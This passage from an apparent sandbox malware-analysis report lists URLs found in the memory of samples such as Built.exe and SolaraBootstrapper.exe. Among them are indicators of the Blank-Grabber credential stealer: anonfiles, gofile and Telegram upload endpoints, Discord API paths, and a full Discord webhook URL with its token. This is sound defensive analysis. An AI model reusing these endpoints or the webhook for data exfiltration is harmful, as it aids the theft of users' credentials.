00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                        Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                        Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                        Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                        Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                        Source: powershell.exe, 00000015.00000002.1799627258.000001F300228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.comd
                        Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
                        Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
                        Source: powershell.exe, 00000011.00000002.1868518526.00000269018A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1799627258.000001F300228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: XClient.exe, 00000006.00000002.2809336308.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1868518526.0000026901681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1799627258.000001F300001000.00000004.00000800.00020000.00000000.sdmp, comReviewsession.exe, 00000026.00000002.1871672428.00000000035E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000011.00000002.1868518526.00000269018A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1799627258.000001F300228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: Built.exe, 00000003.00000002.2054089602.000001D5E5720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
                        Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                        Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                        Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                        Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                        Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                        Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                        Source: powershell.exe, 00000015.00000002.1799627258.000001F300228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: Built.exe, 00000003.00000003.1723015073.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1723076390.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1726133124.000001D5E524B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
                        Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                        Source: Built.exe, 00000003.00000003.1728491309.000001D5E51DB000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1728276236.000001D5E5352000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1728010134.000001D5E5351000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                        Source: Built.exe, 00000003.00000003.1723015073.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1723155170.000001D5E4FF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
                        Source: Built.exe, 00000003.00000003.1837956846.000001D5E4FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftCCD7E~1JSOy.
                        Source: Built.exe, 00000003.00000003.1723015073.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1723076390.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1726133124.000001D5E524B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
                        Source: Built.exe, 00000003.00000002.2054526869.000001D5E58F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
                        Source: Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: Built.exe, 00000003.00000002.2054526869.000001D5E5914000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
                        Source: powershell.exe, 00000011.00000002.1868518526.0000026901681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1799627258.000001F300001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
                        Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload-
                        Source: Built.exe, 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadr
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.github.com/_private/browser/errors
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.github.com/_private/browser/stats
                        Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
                        Source: Built.exe, 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr
                        Source: Built.exe, 00000003.00000003.1929122586.000001D5E5D33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.stripe.com/v
                        Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://avatars.githubusercontent.com
                        Source: Built.exe, 00000003.00000003.1726595751.000001D5E528A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1726708357.000001D5E4E52000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1727130302.000001D5E4E58000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue42195.
                        Source: Built.exe, 00000003.00000002.2054526869.000001D5E5820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
                        Source: Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://collector.github.com/github/collect
                        Source: powershell.exe, 00000015.00000002.1920822285.000001F310077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000015.00000002.1920822285.000001F310077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000015.00000002.1920822285.000001F310077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                        Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                        Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
                        Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                        Source: Built.exe, 00000003.00000003.1929122586.000001D5E5D33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v
                        Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
                        Source: Built.exe, 00000003.00000002.2053454427.000001D5E5620000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/webhooks/1255594789861195827/8s6rt3E8edVCsvsaavUpcA9mRxd3KM7eS7ju4bkPhLPk
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com/get-started/accessibility/keyboard-shortcuts
                        Source: Built.exe, 00000003.00000003.1711153853.000001D5E4CFD000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1711065402.000001D5E4CF5000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1710267778.000001D5E4E89000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1710532955.000001D5E4CBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2041474961.000001D5E2DF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
                        Source: Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: Built.exe, 00000003.00000002.2053069084.000001D5E5520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github-cloud.s3.amazonaws.com
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.blog
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.00000000029F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.00000000029F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com(
                        Source: Built.exe, 00000003.00000002.2050287577.000001D5E543E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
                        Source: Built.exe, 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
                        Source: Built.exe, 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberr
                        Source: Built.exe, 00000003.00000003.1721899935.000001D5E4F9C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1722107518.000001D5E4F9C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1722297762.000001D5E4F9C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1721185120.000001D5E552D000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1722439728.000001D5E4F9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
                        Source: powershell.exe, 00000015.00000002.1799627258.000001F300228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: Built.exe, 00000003.00000003.1703569315.000001D5E2E66000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2042088940.000001D5E4C20000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1707526751.000001D5E2E59000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1709356922.000001D5E2E59000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2041474961.000001D5E2DF1000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1703484396.000001D5E4C21000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1703747283.000001D5E2E6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/collections
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/customer-stories
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/enterprise
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/enterprise/advanced-security
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/enterprise/startups
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/actions
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/code-review
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/codespaces
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/copilot
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/discussions
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/issues
